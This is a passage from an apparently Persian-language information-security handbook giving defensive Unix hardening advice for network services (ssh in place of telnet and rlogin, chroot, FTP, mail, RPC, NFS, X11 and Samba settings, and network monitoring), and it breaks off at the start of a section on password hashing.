‫ﻣﺘﻦﺳﺎﺩﻩ ﺭﻭﻱ ﺍﺗﺼﺎﻻﺕ ﺷﺒﻜﻪ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﺪﻧﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩﻧﺪ‪ .‬ﻫﻴﭽﻜﺪﺍﻡ ﺍﺯ ﺍﻳﻦ ﺭﻭﺷﻬﺎ ﺍﻣﻦ ﻧﻴﺴﺘﻨﺪ‪ .‬ﺑﺮﻧﺎﻣﻪﻫﺎ ﺑﺎﻳﺪ ﺍﺯ ﺭﻭﻳﻜﺮﺩﻫـﺎﻱ‬
‫ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑﺎ ﻛﻠﻴﺪﻫﺎﻱ ﻣﺸﺘﺮﮎ ﻳﺎ ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ .‬ﺍﻣﺮﻭﺯﻩ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺯﻳـﺎﺩﻱ ﺭﺍ‬
‫ﻣﻲﺗﻮﺍﻥ ﻏﻴﺮﻓﻌﺎﻝ ﻛﺮﺩ )‪ (ftp ،rsh ،rcp ،rlogin ،telnet‬ﺗﺎ ﺑﺠﺎﻱ ﻫﻤﺔ ﺁﻧﻬﺎ ﺍﺯ ﭘﻮﺳﺘﺔ ﺍﻣﻦ )‪ (ssh‬ﻛﻪ ﺩﺍﺭﺍﻱ ﻳﻚ ﻣﻜـﺎﻧﻴﺰﻡ ﻣـﺴﺘﺤﻜﻢ ﺑـﺮﺍﻱ‬

‫‪348 Device Files‬‬


‫‪349 Static Routing‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٤٤‬‬

‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺳﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ‪ .‬ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻴـﺪ ﻭ ﺩﺭ ﻓﺎﻳﻠﻬـﺎﻱ ‪ .rhosts‬ﻳـﺎ ‪ /etc/hosts.equiv‬ﺗﻤـﺎﻡ ﺳـﻄﺮﻫﺎﻳﻲ ﺭﺍ ﻛـﻪ‬
‫ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﻣﺎﺷﻴﻨﻬﺎﻱ ﻣﻮﺭﺩ ﺍﻋﺘﻤﺎﺩ ﺭﺍ ﻣﺸﺨﺺ ﻣﻲﻛﻨﻨﺪ ﺣﺬﻑ ﻛﻨﻴـﺪ‪ .‬ﺧـﺪﻣﺎﺕ ﺩﻳﮕـﺮ )‪ (ldap ،http ،imap ،pop‬ﺭﺍ ﺑـﺎ ﻛﺘﺎﺑﺨﺎﻧـﻪﻫـﺎﻱ‬
‫‪ OpenSSL‬ﻛﺎﻣﭙﺎﻳﻞ ﻛﻨﻴﺪ ﺗﺎ ﺍﺯ ﺍﺗﺼﺎﻻﺕ ‪ SSL/TLS‬ﺑﺎ ﻣﺸﺘﺮﻳﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﺼﻮﺭﺕ ﺭﻣﺰﮔـﺬﺍﺭﻱﻧـﺸﺪﻩ‬
‫ﻓﺮﺳﺘﺎﺩﻩ ﻧﺸﻮﻧﺪ‪.‬‬
‫ﺩﺭ ﻣﻮﻗﻌﻴﺘﻬﺎﻳﻲ ﻛﻪ ﺍﻣﻜﺎﻥ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪﺍﻱ ﺭﺍ ﺗﺤﺖ ﺣﺴﺎﺏ ﮐﺎﺭﺑﺮﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻏﻴـﺮ ‪ root‬ﺍﺟـﺮﺍ ﻛﻨﻴـﺪ‪Daemon .‬ﻫـﺎﻱ‬
‫ﺷﺒﻜﻪﺍﻱ ﺑﺴﻴﺎﺭﻱ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﻃﻮﺭﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﺮﺩ ﻛﻪ ﺍﺑﺘﺪﺍ ﺑﺎ ‪ root‬ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺷﻮﻧﺪ )ﺗﺎ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﭘﻮﺭﺗﻲ ﭘـﺎﻳﻴﻨﺘﺮ ﺍﺯ ‪ bind ،١٠٢٤‬ﺷـﻮﻧﺪ‪ ،‬ﭼـﻮﻥ‬
‫ﺍﻳﻨﻜﺎﺭ ﺩﺭ ﺍﻛﺜﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﻧﻴﺎﺯ ﺑﻪ ﺍﻣﺘﻴﺎﺯﺍﺕ ‪ root‬ﺩﺍﺭﺩ( ﻭ ﺳﭙﺲ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﺑﺪﻫﻨﺪ ﻭ ﺗﺤﺖ ﺣﺴﺎﺏ ﮐﺎﺭﺑﺮﻱ ﻳﮏ ﻛﺎﺭﺑﺮ ﻏﻴﺮ ﺍﺯ‬
‫‪ root‬ﺑﻪ ﻛﺎﺭ ﺧﻮﺩ ﺍﺩﺍﻣﻪ ﺩﻫﻨﺪ‪ .‬ﺑﺠﺎﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﻨﻬﺎ ﻳﻚ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻣﺸﺘﺮﻙ ﺑﺮﺍﻱ ‪deamon‬ﻫﺎ )‪ ،(nobody‬ﺑـﻪ ﻫـﺮ ‪daemon‬‬
‫ﻳﻚ ﺣﺴﺎﺏ ﻏﻴﺮ ‪ root‬ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩﺵ ﺭﺍ ﺍﺧﺘﺼﺎﺹ ﺩﻫﻴﺪ‪ .‬ﺍﮔﺮ ﺍﻣﻜﺎﻥ ﺁﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﺧـﺪﻣﺎﺕ ﺷـﺒﻜﻪﺍﻱ ﺭﺍ ﺩﺭ ﻣﺤـﻴﻂ ‪chroot‬‬
‫ﻣﺤﺼﻮﺭ ﻛﻨﻴﺪ ﺗﺎ ﺩﺭﺻﻮﺭﺕ ﺩﺳﺘﻜﺎﺭﻱﺷﺪﻥ‪ ،‬ﺻﺪﻣﺎﺕ ﻭﺍﺭﺩﻩ ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻩ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﺍﮔﺮ ﺧﺪﻣﺎﺕ ‪ FTP‬ﻧﺎﺷﻨﺎﺱ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻴﺪ‪ ،‬ﺍﺯ ﻳﻚ ﻧﺴﺨﺔ ﺑﻪ ﺭﻭﺯ ‪ FTP daemon‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ .‬ﻓﺎﻳﻞ ﺍﺻﻠﻲ ‪ /etc/passwd‬ﺧـﻮﺩ ﺭﺍ‬
‫ﺩﺭ ﻣﺤﺪﻭﺩﺓ ‪ FTP‬ﻗﺮﺍﺭ ﻧﺪﻫﻴﺪ‪ .‬ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺩﺭ ﻓﺎﻳﻞ ‪ /etc/ftpusers‬ﻓﻬﺮﺳﺖ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻧﻨـﺪ ﺑـﻪ ‪ FTP‬ﻭﺻـﻞ‬
‫ﺷﻮﻧﺪ ﺷﺎﻣﻞ ﻛﺎﺭﺑﺮﺍﻧﻲ ﭼﻮﻥ ‪ bin ،uucp ،root‬ﻭ ﻫﺮ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺩﻳﮕﺮﻱ ﻛﻪ ﻣﺘﻌﻠﻖ ﺑﻪ ﻳﻚ ﺍﻧﺴﺎﻥ ﻭﺍﻗﻌﻲ ﻧﻴﺴﺖ ﻫﻢ ﺑﺎﺷﺪ‪ .‬ﻧـﺴﺒﺖ‬
‫ﺑﻪ ﻣﺠﻮﺯﻫﺎ ﻭ ﻣﺎﻟﻜﻴﺖ ﺷﺎﺧﻪﻫﺎﻱ ﺩﺭﻭﻥ ﻣﺤﺪﻭﺩﺓ ‪ FTP‬ﻫﻤﻮﺍﺭﻩ ﻫﻮﺷﻴﺎﺭ ﺑﺎﺷﻴﺪ‪ .‬ﺷﺎﺧﻪﻫـﺎﻱ ﻭﺭﻭﺩﻱ ﺭﺍ ﻃـﻮﺭﻱ ﺗﻨﻈـﻴﻢ ﻛﻨﻴـﺪ ﻛـﻪ ﺍﺟـﺎﺯﺓ‬
‫‪ download‬ﻧﺪﻫﻨﺪ ﻭ ﺷﺎﺧﻪﻫﺎﻱ ﺧﺮﻭﺟﻲ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﻨﻴﺪ ﻛﻪ ﻣﺎﻧﻊ ‪ upload‬ﺷﻮﻧﺪ‪ ،‬ﻭ ﺛﺒﺘﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ‪ FTP‬ﺭﺍ ﻧﻴﺰ ﺑﻄﻮﺭ‬
‫ﻣﻨﻈﻢ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪.‬‬
‫ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﺑﻪ ﺟﺎﻱ ‪ sendmail‬ﺍﺯ ‪ ،exim ،postfix‬ﻳﺎ ‪ qmail‬ﺑﻌﻨﻮﺍﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ‪ .‬ﻫـﻴﭻ‬
‫ﻭﻳﺮﺍﻳﺸﻲ ﺍﺯ ﺑﺮﻧﺎﻣﺔ ‪ MTA‬ﺧﻮﺩ ﺟﺰ ﺁﺧﺮﻳﻦ ﻭﻳﺮﺍﻳﺶ ﺁﻧﺮﺍ ﺑﻜﺎﺭ ﻧﺒﺮﻳﺪ‪ .‬ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻨﻜﻪ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﮑﺘﺮﻭﻧﻴﮑﻲ ﻣﺮﺑﻮﻁ ﺑـﻪ ﺣـﺴﺎﺑﻬﺎﻱ‬
‫ﻣﺠﺎﺯ ﻏﻴﺮﻛﺎﺭﺑﺮﻱ ﺑﻪ ﻳﻚ ﻛﺎﺭﺑﺮ ﻭﺍﻗﻌﻲ ﺗﺤﻮﻳﻞ ﻣﻲﺷﻮﻧﺪ ﺍﺯ "‪"mail alias‬ﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ؛ ﺑﻌﺒﺎﺭﺕ ﺩﻳﮕﺮ ﺍﺯ ﺗﺤﻮﻳﻞ ﻧﺎﻣﻪﻫﺎ ﺑﻪ ﺁﺩﺭﺳـﻬﺎﻱ‬
‫‪ postmaster ،root‬ﻭ ‪ abuse‬ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ‪ .‬ﺍﺯ ﺍﻳﺠﺎﺩ ﺗﻐﻴﻴـﺮﺍﺕ ﺩﺭ ﻓﺎﻳـﻞ ﻣﺮﺑـﻮﻁ ﺑـﻪ "‪"mail alias‬ﻫـﺎ ﺗﻮﺳـﻂ ﺍﻓـﺮﺍﺩ ﻏﻴﺮﻣﺠـﺎﺯ‬
‫ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ "‪"mail alias‬ﻫﺎﻳﻲ ﺩﺍﺭﻳﺪ ﻛﻪ ﻧﺎﻣﻪﻫﺎ ﺭﺍ ﺑﻪ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻳﺎ ﻓﺎﻳﻠﻬﺎ ﻣﻲﺭﺳﺎﻧﻨﺪ‪ ،‬ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﺩﻗﺖ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗـﺮﺍﺭ ﺩﻫﻴـﺪ ﻭ‬
‫ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﺁﻧﻬﺎ ﺭﺍ ﺣﺬﻑ ﻛﻨﻴﺪ‪.‬‬
‫ﺍﮔﺮ ﻣﺎﺷﻴﻨﻬﺎﻱ ﭼﻨﺪﻛﺎﺭﺑﺮﻩ ﺩﺍﺭﻳﺪ‪ ،‬ﺣﺘﻤﹰﺎ ﺭﻭﻱ ﺁﻥ ‪deamon‬ﻫﺎﻱ ‪ authd‬ﻭ ‪ identd‬ﺭﺍ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻭﺭﻳﺪ‪ .‬ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻭﻗﺘﻲ ﻣﻔﻴﺪ ﺍﺳـﺖ‬
‫ﻛﻪ ﮔﺰﺍﺭﺷﻲ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻴﺪ ﻣﺒﻨﻲ ﺑﺮ ﺍﻳﻨﻜﻪ ﻛﺴﻲ ﺑﺎ ﻭﺍﺳﻄﻪ ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻤﺎ ﺑﻪ ﺳﻴﺴﺘﻢ ﺩﻳﮕﺮﻱ ﺣﻤﻠﻪ ﻛﺮﺩﻩ ﺍﺳـﺖ‪ .‬ﻧـﺴﺨﻪ‪-‬‬
‫ﻫﺎﻳﻲ ﺭﺍ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﻛﻪ ﻣﺸﺨﺼﻪﻫﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺑﺎﺯ ﻣﻲﮔﺮﺩﺍﻧﻨﺪ ﺗﺎ ﺍﺯ ﺍﻓـﺸﺎﻱ ﺍﻃﻼﻋـﺎﺕ ﻛـﺎﺭﺑﺮﺍﻥ ﺧـﻮﺩ ﺑـﻪ ﺧـﺎﺭﺝ ﺍﺯ‬
‫ﺳﻴﺴﺘﻢ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﺍﮔﺮ ﺍﺯ ‪ RPC‬ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻛﻨﻴﺪ ‪ portmapper daemon‬ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‪ ،‬ﻭ ﺍﮔﺮ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺁﻧـﺮﺍ ﻣﺤـﺪﻭﺩ‬
‫ﻧﻤﺎﻳﻴﺪ ﻭ ﻗﺎﺑﻠﻴﺖ ‪ securenets‬ﺭﺍ ﺩﺭﺻﻮﺭﺕ ﻭﺟﻮﺩ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ .‬ﻫﺮ ﺳﺮﻭﻳﺲ ‪ RPC‬ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺗﻮﺳﻂ ‪ inetd‬ﻛـﻪ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻧﻤﻲﻛﻨﻴﺪ )ﻭ ﻣﺨﺼﻮﺻﹰﺎ ‪ (rexd‬ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ‪ Secure RPC‬ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺗﻨﻬـﺎ ﺗﻜﻴـﻪﮔـﺎﻩ‬
‫ﻣﻌﻘﻮﻝ ﺑﺮﺍﻱ ‪ NIS+‬ﻭ ‪ Secure RPC ،NFS‬ﻣﻲﺑﺎﺷﺪ‪ .‬ﺍﺯ ﺑﻜﺎﺭﮔﻴﺮﻱ ‪ NIS‬ﻳﺎ ‪ NIS+‬ﺩﺭ ﺣﺎﻟﺖ ﺳﺎﺯﮔﺎﺭﻱ‪ ٣٥٠‬ﺍﺟﺘﻨﺎﺏ ﻛﻨﻴﺪ‪ .‬ﺩﺭﺻﻮﺭﺕ‬
‫ﻧﻴﺎﺯ ﺑﻪ ‪ NFS‬ﺍﺯ ﻭﻳﺮﺍﻳﺶ ‪ ٣‬ﺁﻥ ﺩﺭ ﺣﺎﻟﺖ ‪ TCP‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻭ ﺗﻌﺪﺍﺩ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻓﺎﻳﻠﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻥ ﺻﺎﺩﺭ ﻛﺮﺩ ﻭ ﻣﺠﻤﻮﻋﺔ ﻣﻴﺰﺑﺎﻧﻬـﺎﻳﻲ‬
‫ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺁﻧﻬﺎ ﺭﺍ ‪ mount‬ﻛﻨﻨﺪ ﺭﺍ ﻣﺤﺪﻭﺩ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺳﻌﻲ ﻛﻨﻴﺪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻓﺎﻳﻞ ﺭﺍ ﺑﺼﻮﺭﺕ ﻓﻘﻂ ﺧﻮﺍﻧﺪﻧﻲ ﺻﺎﺩﺭ ﻛﻨﻴـﺪ‪ NFS .‬ﺍﺟـﺎﺯﻩ‬
‫ﻧﻤﻲﺩﻫﺪ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﻣﺎﻟﻜﺸﺎﻥ ‪ root‬ﺍﺳﺖ ﺗﻮﺳﻂ ‪ root‬ﻣﺎﺷﻴﻦ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺗﻐﻴﻴﺮ ﻛﻨﻨﺪ‪ ،‬ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﺻﺮﻳﺤﹰﺎ ﺧﻼﻑ ﺁﻧﺮﺍ ﺫﻛـﺮ ﻛـﺮﺩﻩ‬
‫ﺑﺎﺷﻴﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﻬﺘﺮ ﺍﺳﺖ ﺣﺴﺎﺏ ﮐﺎﺭﺑﺮﻱ ﻛﺎﺭﺑﺮ ‪ root‬ﻣﺎﻟﻚ ﺗﻤﺎﻡ ﻓﺎﻳﻠﻬﺎ ﻭ ﺷﺎﺧﻪﻫﺎﻱ ﺻﺎﺩﺭﺷﺪﻩ ﺑﺎﺷﺪ ﻭ ﻧـﻪ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ ﺩﻳﮕـﺮﻱ‬
‫)ﻣﺎﻧﻨﺪ ‪ (bin‬ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﻤﻨﺎﻡ ﺁﻥ ﺭﻭﻱ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬

‫‪350 Compatibility Mode‬‬


‫‪٤٤٥‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺩﺭﺻﻮﺭﺕ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ ،X11‬ﻗﻮﻳﺘﺮﻳﻦ ﻣﻜـﺎﻧﻴﺰﻡ ﻣﻤﻜـﻦ ﺑـﺮﺍﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﺭﺍ ﺑﻜـﺎﺭ ﺑﮕﻴﺮﻳـﺪ‪ Kerberos .‬ﻳـﺎ "‪"Secure RPC‬‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺴﺘﺤﻜﻤﻲ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻫﺴﺘﻨﺪ ﻭ "‪ "Magic Cookies‬ﺿﻌﻴﻔﺘﺮ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺖ‪ ،‬ﻭ ﺑﺮﻧﺎﻣـﺔ ‪ xhost‬ﻧﻴـﺰ ﺍﺯ ﻛﻤﺘـﺮﻳﻦ‬
‫ﺣﺪ ﺍﻣﻨﻴﺖ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪ .‬ﺗﻮﻧﻞﺯﺩﻥ ﺍﺗﺼﺎﻻﺕ ‪ X11‬ﺍﺯ ﻃﺮﻳﻖ ‪ SSH‬ﻧﻴﺰ ﻣﺤﺎﻓﻈﺖ ﺧﻮﺑﻲ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺍﮔﺮ ﺳﺮﻭﻳﺲ ‪ SMB‬ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ‪ Samba‬ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻴﺪ‪ ،‬ﺍﻣﻨﻴﺖ "ﻛﺎﺭﺑﺮ" ﻳﺎ "ﺩﺍﻣﻨﻪ" ﺭﺍ ﺑﺮ ﺍﻣﻨﻴﺖ "ﺍﺷﺘﺮﺍﻙ" ﺍﻭﻟﻮﻳﺖ ﺩﻫﻴﺪ‪ .‬ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﻓﻌﺎﻝ ﻛﻨﻴﺪ ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻗﺎﺑﻠﻴﺖ "‪ "min protocol‬ﺩﺭ ‪ Samba‬ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﺭﺍ ﻣﺠﺒﻮﺭ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﺧـﺮﻳﻦ‬
‫ﻭﻳﺮﺍﻳﺶ ﭘﺮﻭﺗﻜﻞ ‪ SMB‬ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﺯ ﮔﺰﻳﻨﺔ "‪ "admin user‬ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ ﻭ ﻳﺎ ﺍﮔﺮ ﻫﻢ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﻣـﻲﻛﻨﻴـﺪ‪ ،‬ﺑﻴـﺖ ﺁﺭﺷـﻴﻮ ‪ DOS‬ﺭﺍ ﺑـﻪ‬
‫"ﻗﺎﺑﻞ ﺍﺟﺮﺍ" )ﺩﺭ ‪ (Unix‬ﺗﺒﺪﻳﻞ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻧﺤﻮﺓ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﮔﺰﻳﻨﺔ "‪ "veto files‬ﺭﺍ ﻧﻴﺰ ﺑﻴﺎﻣﻮﺯﻳﺪ‪.‬‬
‫ﭼﺸﻢ ﺍﺯ ﺷﺒﻜﺔ ﺧﻮﺩ ﺑﺮ ﻧﺪﺍﺭﻳﺪ‪ .‬ﺧﺮﻭﺟﻴﻬﺎﻱ ‪ netstat‬ﻭ ‪ lsof‬ﺭﺍ ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﺗﺎ ﺑﺒﻴﻨﻴﺪ ﭼﻪ ﺍﺗﺼﺎﻻﺕ ﺷﺒﻜﻪﺍﻱ ﺍﺯ ﻭ ﺑﻪ ﺳﻴﺴﺘﻢ‬
‫ﺷﻤﺎ ﺍﻳﺠﺎﺩ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﺯ ‪ who‬ﻭ ‪ last‬ﺑﺮﺍﻱ ﺩﻳﺪﻥ ﺍﺗﺼﺎﻻﺕ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ .‬ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ‪ ISS ،Nessus ،nmap‬ﻭ ﺳـﺎﻳﺮ‬
‫ﭘﻮﻳﺸﮕﺮﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ‪ ،‬ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺑﻴﺮﻭﻥ ﻛﺎﻭﺵ ﻛﻨﻴﺪ ﺗﺎ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﺣﺘﻤﺎﻟﻲ ﻛﻪ ﺑﺎﻳﺪ ﺍﺻﻼﺡ ﺷﻮﻧﺪ ﺭﺍ ﭘﻴﺪﺍ ﻛﻨﻴـﺪ‪ .‬ﺷـﺎﻳﺪ‬
‫ﺑﻬﺘﺮﻳﻦ ﻛﺎﺭ ﺑﺮﺍﻱ ﺑﻌﻀﻲ ﻣﺎﺷﻴﻨﻬﺎ ﺟﺪﺍﺳﺎﺯﻱ ﻛﺎﻣﻞ ﺁﻧﻬﺎ ﺍﺯ ﺷﺒﻜﻪ ﺑﺎﺷﺪ‪.‬‬

‫ﻣﺤﺎﻓﻈﺖ ﺍﺯ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ‬


‫ﺍﻭﻟﻴﻦ ﺧﻂ ﺩﻓﺎﻋﻲ ﺑﺮﺍﻱ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺩﺭ ‪ Unix‬ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺁﻧﺎﻥ ﺍﺳﺖ‪ .‬ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﺑﺼﻮﺭﺕ ﻣﺘﻦﺳـﺎﺩﻩ‬
‫ﺫﺧﻴﺮﻩ ﻧﻤﻲﻧﻤﺎﻳﻨﺪ‪ ،‬ﺑﻠﻜﻪ ﺍﺯ ﻳﻚ ﺩﺭﻫﻢﺭﻳﺰﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ‪ ٣٥١‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﻗﺎﺑﻞ ﺑﺎﺯﮔﺸﺖ ﺑﻪ ﺍﺻﻞ ﺭﻣﺰ ﻋﺒﻮﺭ ﻧﻴﺴﺖ‪ .‬ﻭﻗﺘـﻲ ﻛـﺎﺭﺑﺮﻱ‬
‫ﻣﻲﺧﻮﺍﻫﺪ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﻮﺩ‪ ،‬ﺩﺭﻫﻤﺮﻳﺨﺘﺔ ﺁﻧﭽﻪ ﺑﻌﻨﻮﺍﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﻭﺍﺭﺩ ﺷﺪﻩ ﻣﺤﺎﺳﺒﻪ ﻣـﻲﺷـﻮﺩ ﻭ ﺑـﺎ ﻣﻘـﺪﺍﺭ ﺫﺧﻴـﺮﻩﺷـﺪﺓ ﻗﺒﻠـﻲ ﻣﻘﺎﻳـﺴﻪ‬
‫ﻣﻲﮔﺮﺩﺩ‪.‬‬
